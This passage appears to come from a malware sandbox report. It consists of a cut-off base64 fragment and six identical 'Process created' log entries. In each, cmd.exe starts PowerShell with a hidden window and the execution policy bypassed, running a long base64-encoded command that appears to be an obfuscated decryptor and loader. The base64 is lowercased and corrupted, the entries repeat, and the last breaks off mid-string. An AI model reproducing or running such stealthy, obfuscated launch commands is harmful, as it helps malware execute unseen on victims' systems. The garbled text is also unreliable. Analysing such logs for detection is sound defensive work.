v92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo